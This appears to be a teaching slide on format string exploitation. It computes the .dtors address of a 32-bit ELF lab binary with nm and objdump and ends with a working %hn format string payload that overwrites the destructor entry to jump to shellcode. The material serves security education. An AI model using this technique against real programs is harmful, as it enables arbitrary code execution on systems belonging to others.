Computing .dtors Location
•Address location for our jump to shellcode should be 4 bytes past the
DTOR_LIST
•Target address using example above is 0x080495bc
$ nm
./fmtstr | grep DTOR
080495bc
d __DTOR_END__
080495b8
d __DTOR_LIST__
$
objdump -s -j .dtors ./fmtstr
./fmtstr: file format
elf32-i386
Contents
of section .dtors:
80495b8 ffffffff 00000000
........
$
./fmtstr `printf
“\xbe\x95\x04\x08\xbc\x95\x04\x08”`%.49143x$4\$hn%.16086x%5\$hn